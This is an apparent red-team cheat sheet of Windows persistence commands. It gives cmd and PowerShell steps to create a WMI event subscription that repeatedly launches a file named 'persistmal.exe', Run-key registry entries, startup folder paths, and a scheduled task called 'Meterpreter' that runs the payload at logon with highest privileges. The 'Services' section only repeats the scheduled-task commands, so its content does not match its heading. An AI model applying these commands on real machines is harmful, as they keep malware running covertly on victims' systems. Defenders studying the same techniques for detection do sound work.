WMI

Execute in cmd.exe in administrator mode: wmic /NAMESPACE:\\root\subscription PATH __EventFilter CREATE Name="Meter", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"


Execute in Powershell.exe to verify: Get-WmiObject __EventFilter -Namespace root\subscription


Execute in cmd.exe in administrator mode: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="Meter", ExecutablePath="C:\Users\User\Downloads\persistmal.exe",CommandLineTemplate="C:\Users\User\Downloads\persistmal.exe"


Execute in Powershell.exe to verify: Get-WmiObject CommandLineEventConsumer -Namespace root\subscription | Select-Object Name, ExecutablePath, CommandLineTemplate


Execute in cmd.exe in administrator mode: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Meter\"", Consumer="CommandLineEventConsumer.Name=\"Meter\""


Execute in Powershell.exe to verify: : Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Select-Object Filter, Consumer


Reference: https://practicalsecurityanalytics.com/persistence-with-wmi-event-subscription-and-powershell-cradles/

------------------------------------------------------------------------------------------------------------


RunKey Registry


User-Level:


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce


System-Level (All Users):


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce


reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "CalcPersistence" /t REG_SZ /d "C:\Windows\System32\calc.exe" /f


reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "CalcPersistence" /f

---------------------------------------------------------------------------------------------------------------


Starup Folder

Current User:


C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


All Users:


C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

-----------------------------------------------------------------------------------------------------------------


Scheduled Task

Add a task


schtasks /create /tn "Meterpreter" /tr "C:\Users\User\Downloads\persistmal.exe" /sc onlogon /rl highest /f


Verify the Task


schtasks /query /tn "Meterpreter"


Delete the Task (If Needed)


schtasks /delete /tn "Meterpreter" /f

------------------------------------------------------------------------------------------------------------------

Services

Add a task


schtasks /create /tn "Meterpreter" /tr "C:\Users\User\Downloads\persistmal.exe" /sc onlogon /rl highest /f



Verify the Task


schtasks /query /tn "Meterpreter"


Delete the Task (If Needed)


schtasks /delete /tn "Meterpreter" /f